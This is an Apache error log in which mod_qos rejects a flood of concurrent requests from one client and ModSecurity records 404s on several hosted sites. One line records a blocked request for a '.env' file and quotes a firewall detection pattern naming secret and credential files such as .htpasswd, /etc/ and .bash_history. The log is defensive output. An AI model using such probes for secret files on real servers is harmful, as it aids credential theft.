[Tue May 26 19:54:27.850560 2026] [qos:error] [pid 93576:tid 93828] [client 45.148.10.120:35270] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG2DRMqfxdEDkoszQlwAAAHQ
[Tue May 26 19:54:27.870495 2026] [qos:error] [pid 86490:tid 86733] [client 45.148.10.120:35158] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG1ZMwN0DpLVWo6K-LQAAAPY
[Tue May 26 19:54:27.873907 2026] [qos:error] [pid 86490:tid 86693] [client 45.148.10.120:34924] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG1ZMwN0DpLVWo6K-LgAAAM4
[Tue May 26 19:54:27.875018 2026] [qos:error] [pid 93576:tid 93739] [client 45.148.10.120:35228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG2DRMqfxdEDkoszQmAAAABs
[Tue May 26 19:54:27.887369 2026] [qos:error] [pid 93576:tid 93831] [client 45.148.10.120:35278] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG2DRMqfxdEDkoszQmQAAAHc
[Tue May 26 19:54:27.903273 2026] [qos:error] [pid 86490:tid 86721] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG1ZMwN0DpLVWo6K-LwAAAOo
[Tue May 26 19:54:27.925499 2026] [qos:error] [pid 86490:tid 86685] [client 45.148.10.120:35000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG1ZMwN0DpLVWo6K-MAAAAMY
[Tue May 26 19:54:27.984567 2026] [qos:error] [pid 86490:tid 86729] [client 45.148.10.120:34906] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG1ZMwN0DpLVWo6K-MgAAAPI
[Tue May 26 19:54:27.990847 2026] [qos:error] [pid 86490:tid 86633] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG1ZMwN0DpLVWo6K-NAAAAJI
[Tue May 26 19:54:27.999040 2026] [qos:error] [pid 93576:tid 93782] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG2DRMqfxdEDkoszQmgAAAEY
[Tue May 26 19:54:28.000493 2026] [qos:error] [pid 93576:tid 93754] [client 45.148.10.120:35270] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtG2DRMqfxdEDkoszQmwAAACo
[Tue May 26 19:54:28.022228 2026] [qos:error] [pid 86490:tid 86705] [client 45.148.10.120:35158] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHFZMwN0DpLVWo6K-NwAAANo
[Tue May 26 19:54:28.026980 2026] [qos:error] [pid 86490:tid 86657] [client 45.148.10.120:34924] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHFZMwN0DpLVWo6K-OAAAAKo
[Tue May 26 19:54:28.034955 2026] [qos:error] [pid 93576:tid 93792] [client 45.148.10.120:35228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHGDRMqfxdEDkoszQnQAAAFA
[Tue May 26 19:54:28.038366 2026] [qos:error] [pid 93576:tid 93784] [client 45.148.10.120:35278] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHGDRMqfxdEDkoszQngAAAEg
[Tue May 26 19:54:28.053819 2026] [qos:error] [pid 86490:tid 86701] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHFZMwN0DpLVWo6K-OQAAANY
[Tue May 26 19:54:28.079607 2026] [qos:error] [pid 86490:tid 86672] [client 45.148.10.120:35000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHFZMwN0DpLVWo6K-OgAAALk
[Tue May 26 19:54:28.133598 2026] [qos:error] [pid 86490:tid 86643] [client 45.148.10.120:34906] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHFZMwN0DpLVWo6K-PAAAAJw
[Tue May 26 19:54:28.139528 2026] [qos:error] [pid 86490:tid 86711] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHFZMwN0DpLVWo6K-PQAAAOA
[Tue May 26 19:54:28.147108 2026] [qos:error] [pid 93576:tid 93796] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHGDRMqfxdEDkoszQnwAAAFQ
[Tue May 26 19:54:28.160735 2026] [qos:error] [pid 93576:tid 93747] [client 45.148.10.120:35270] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHGDRMqfxdEDkoszQoAAAACM
[Tue May 26 19:54:28.171701 2026] [qos:error] [pid 86490:tid 86708] [client 45.148.10.120:35158] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHFZMwN0DpLVWo6K-PgAAAN0
[Tue May 26 19:54:28.180691 2026] [qos:error] [pid 86490:tid 86674] [client 45.148.10.120:34924] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHFZMwN0DpLVWo6K-QAAAALs
[Tue May 26 19:54:28.190873 2026] [qos:error] [pid 93576:tid 93717] [client 45.148.10.120:35278] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHGDRMqfxdEDkoszQoQAAAAU
[Tue May 26 19:54:28.192066 2026] [qos:error] [pid 93576:tid 93774] [client 45.148.10.120:35228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHGDRMqfxdEDkoszQogAAAD4
[Tue May 26 19:54:28.205304 2026] [qos:error] [pid 86490:tid 86727] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHFZMwN0DpLVWo6K-QgAAAPA
[Tue May 26 19:54:28.245160 2026] [qos:error] [pid 86490:tid 86726] [client 45.148.10.120:35000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHFZMwN0DpLVWo6K-RgAAAO8
[Tue May 26 19:54:28.273506 2026] [security2:error] [pid 86490:tid 86735] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGlZMwN0DpLVWo6K9mQAAAPg"]
[Tue May 26 19:54:28.275149 2026] [security2:error] [pid 86490:tid 86746] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGlZMwN0DpLVWo6K9jwAAAQM"]
[Tue May 26 19:54:28.275689 2026] [security2:error] [pid 93576:tid 93835] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGmDRMqfxdEDkoszQWAAAAHs"]
[Tue May 26 19:54:28.279600 2026] [security2:error] [pid 86490:tid 86691] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGlZMwN0DpLVWo6K9nAAAAMw"]
[Tue May 26 19:54:28.283068 2026] [security2:error] [pid 93868:tid 94330] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGkqK9k_ZUB2Vp25IqwAAAdc"]
[Tue May 26 19:54:28.292058 2026] [security2:error] [pid 93576:tid 93724] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGmDRMqfxdEDkoszQXQAAAAw"]
[Tue May 26 19:54:28.292760 2026] [security2:error] [pid 93868:tid 94359] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGkqK9k_ZUB2Vp25IoAAAAfQ"]
[Tue May 26 19:54:28.299876 2026] [security2:error] [pid 86490:tid 86738] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGlZMwN0DpLVWo6K9nwAAAPs"]
[Tue May 26 19:54:28.305568 2026] [security2:error] [pid 93576:tid 93812] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGmDRMqfxdEDkoszQXwAAAGQ"]
[Tue May 26 19:54:28.305839 2026] [security2:error] [pid 93576:tid 93769] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGmDRMqfxdEDkoszQZQAAADk"]
[Tue May 26 19:54:28.307699 2026] [security2:error] [pid 86490:tid 86667] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGlZMwN0DpLVWo6K9mwAAALQ"]
[Tue May 26 19:54:28.316504 2026] [security2:error] [pid 86490:tid 86712] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGlZMwN0DpLVWo6K9qAAAAOE"]
[Tue May 26 19:54:28.320154 2026] [security2:error] [pid 93868:tid 94345] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGkqK9k_ZUB2Vp25IpwAAAeY"]
[Tue May 26 19:54:28.327475 2026] [security2:error] [pid 86490:tid 86679] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGlZMwN0DpLVWo6K9qgAAAMA"]
[Tue May 26 19:54:28.328915 2026] [security2:error] [pid 93576:tid 93797] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGmDRMqfxdEDkoszQWQAAAFU"]
[Tue May 26 19:54:28.330119 2026] [security2:error] [pid 93868:tid 94347] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGkqK9k_ZUB2Vp25IrwAAAeg"]
[Tue May 26 19:54:28.332735 2026] [security2:error] [pid 93576:tid 93726] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGmDRMqfxdEDkoszQZAAAAA4"]
[Tue May 26 19:54:28.336872 2026] [security2:error] [pid 93868:tid 94312] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtG0qK9k_ZUB2Vp25IuQAAAcU"]
[Tue May 26 19:54:28.337485 2026] [security2:error] [pid 93868:tid 94329] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGkqK9k_ZUB2Vp25IrQAAAdY"]
[Tue May 26 19:54:28.359219 2026] [security2:error] [pid 93868:tid 94296] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtG0qK9k_ZUB2Vp25IuAAAAbU"]
[Tue May 26 19:54:28.363908 2026] [security2:error] [pid 93868:tid 94314] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtG0qK9k_ZUB2Vp25ItgAAAcc"]
[Tue May 26 19:54:28.377699 2026] [security2:error] [pid 86490:tid 86634] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGlZMwN0DpLVWo6K9rQAAAJM"]
[Tue May 26 19:54:28.381966 2026] [security2:error] [pid 93576:tid 93822] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGmDRMqfxdEDkoszQYAAAAG4"]
[Tue May 26 19:54:28.395810 2026] [security2:error] [pid 93868:tid 94332] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtG0qK9k_ZUB2Vp25IuwAAAdk"]
[Tue May 26 19:54:28.411659 2026] [security2:error] [pid 93576:tid 93715] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtG2DRMqfxdEDkoszQeAAAAAM"]
[Tue May 26 19:54:28.414155 2026] [security2:error] [pid 93576:tid 93757] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtG2DRMqfxdEDkoszQhQAAAC0"]
[Tue May 26 19:54:28.416980 2026] [security2:error] [pid 93576:tid 93830] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtG2DRMqfxdEDkoszQcwAAAHY"]
[Tue May 26 19:54:28.423630 2026] [security2:error] [pid 93576:tid 93731] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtG2DRMqfxdEDkoszQiAAAABM"]
[Tue May 26 19:54:28.424414 2026] [security2:error] [pid 93576:tid 93749] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtG2DRMqfxdEDkoszQggAAACU"]
[Tue May 26 19:54:28.425016 2026] [security2:error] [pid 93868:tid 94370] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtG0qK9k_ZUB2Vp25IvQAAAf8"]
[Tue May 26 19:54:28.426638 2026] [security2:error] [pid 86490:tid 86730] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtG1ZMwN0DpLVWo6K9_QAAAPM"]
[Tue May 26 19:54:28.437297 2026] [security2:error] [pid 93576:tid 93743] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtG2DRMqfxdEDkoszQdwAAAB8"]
[Tue May 26 19:54:28.439541 2026] [security2:error] [pid 86490:tid 86669] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtG1ZMwN0DpLVWo6K98gAAALY"]
[Tue May 26 19:54:28.445597 2026] [security2:error] [pid 93576:tid 93730] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtG2DRMqfxdEDkoszQhAAAABI"]
[Tue May 26 19:54:28.460566 2026] [security2:error] [pid 93868:tid 94271] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtG0qK9k_ZUB2Vp25IxwAAAZw"]
[Tue May 26 19:54:28.467257 2026] [security2:error] [pid 93576:tid 93816] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtG2DRMqfxdEDkoszQhwAAAGg"]
[Tue May 26 19:54:28.469435 2026] [security2:error] [pid 93576:tid 93839] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtG2DRMqfxdEDkoszQgwAAAH8"]
[Tue May 26 19:54:28.471669 2026] [security2:error] [pid 86490:tid 86628] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtG1ZMwN0DpLVWo6K-CAAAAI0"]
[Tue May 26 19:54:28.473983 2026] [security2:error] [pid 93868:tid 94340] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtG0qK9k_ZUB2Vp25IyQAAAeE"]
[Tue May 26 19:54:28.597160 2026] [qos:error] [pid 93576:tid 93827] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtHGDRMqfxdEDkoszQvAAAAHM
[Tue May 26 19:54:28.597309 2026] [qos:error] [pid 93868:tid 94267] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtHEqK9k_ZUB2Vp25I6QAAAZg
[Tue May 26 19:54:28.600565 2026] [qos:error] [pid 93576:tid 93776] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtHGDRMqfxdEDkoszQvgAAAEA
[Tue May 26 19:54:28.601263 2026] [qos:error] [pid 93576:tid 93751] [client 45.148.10.120:35242] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHGDRMqfxdEDkoszQvwAAACc
[Tue May 26 19:54:28.617020 2026] [security2:error] [pid 86490:tid 86660] [client 185.177.72.53:35070] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/java/.env"] [unique_id "ahWtHFZMwN0DpLVWo6K-owAAAK0"]
[Tue May 26 19:54:28.619659 2026] [qos:error] [pid 93576:tid 93823] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHGDRMqfxdEDkoszQwgAAAG8
[Tue May 26 19:54:28.625828 2026] [qos:error] [pid 86490:tid 86719] [client 45.148.10.120:34780] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHFZMwN0DpLVWo6K-pAAAAOg
[Tue May 26 19:54:28.625914 2026] [qos:error] [pid 86490:tid 86722] [client 45.148.10.120:34862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHFZMwN0DpLVWo6K-pQAAAOs
[Tue May 26 19:54:28.628768 2026] [qos:error] [pid 86490:tid 86738] [client 45.148.10.120:34866] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHFZMwN0DpLVWo6K-pgAAAPs
[Tue May 26 19:54:28.631901 2026] [qos:error] [pid 86490:tid 86702] [client 45.148.10.120:34984] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHFZMwN0DpLVWo6K-pwAAANc
[Tue May 26 19:54:28.708494 2026] [qos:error] [pid 93868:tid 94338] [client 45.148.10.120:56886] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHEqK9k_ZUB2Vp25I6gAAAd8
[Tue May 26 19:54:28.710887 2026] [security2:error] [pid 86490:tid 86703] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtHFZMwN0DpLVWo6K-RQAAANg"]
[Tue May 26 19:54:28.750206 2026] [qos:error] [pid 86490:tid 86628] [client 45.148.10.120:34946] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHFZMwN0DpLVWo6K-qgAAAI0
[Tue May 26 19:54:28.752275 2026] [qos:error] [pid 86490:tid 86669] [client 45.148.10.120:35014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHFZMwN0DpLVWo6K-qwAAALY
[Tue May 26 19:54:28.754471 2026] [qos:error] [pid 86490:tid 86718] [client 45.148.10.120:34934] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHFZMwN0DpLVWo6K-rAAAAOc
[Tue May 26 19:54:28.755724 2026] [qos:error] [pid 93576:tid 93739] [client 45.148.10.120:35242] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHGDRMqfxdEDkoszQwwAAABs
[Tue May 26 19:54:28.767927 2026] [qos:error] [pid 93576:tid 93831] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHGDRMqfxdEDkoszQxAAAAHc
[Tue May 26 19:54:28.779110 2026] [qos:error] [pid 86490:tid 86719] [client 45.148.10.120:34862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHFZMwN0DpLVWo6K-rwAAAOg
[Tue May 26 19:54:28.779832 2026] [qos:error] [pid 86490:tid 86726] [client 45.148.10.120:34866] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHFZMwN0DpLVWo6K-sAAAAO8
[Tue May 26 19:54:28.780985 2026] [qos:error] [pid 86490:tid 86738] [client 45.148.10.120:34780] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHFZMwN0DpLVWo6K-sQAAAPs
[Tue May 26 19:54:28.781052 2026] [qos:error] [pid 86490:tid 86702] [client 45.148.10.120:34984] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHFZMwN0DpLVWo6K-sgAAANc
[Tue May 26 19:54:28.858121 2026] [qos:error] [pid 93868:tid 94268] [client 45.148.10.120:56886] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHEqK9k_ZUB2Vp25I6wAAAZk
[Tue May 26 19:54:28.904332 2026] [qos:error] [pid 86490:tid 86658] [client 45.148.10.120:34946] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtHFZMwN0DpLVWo6K-uAAAAKs
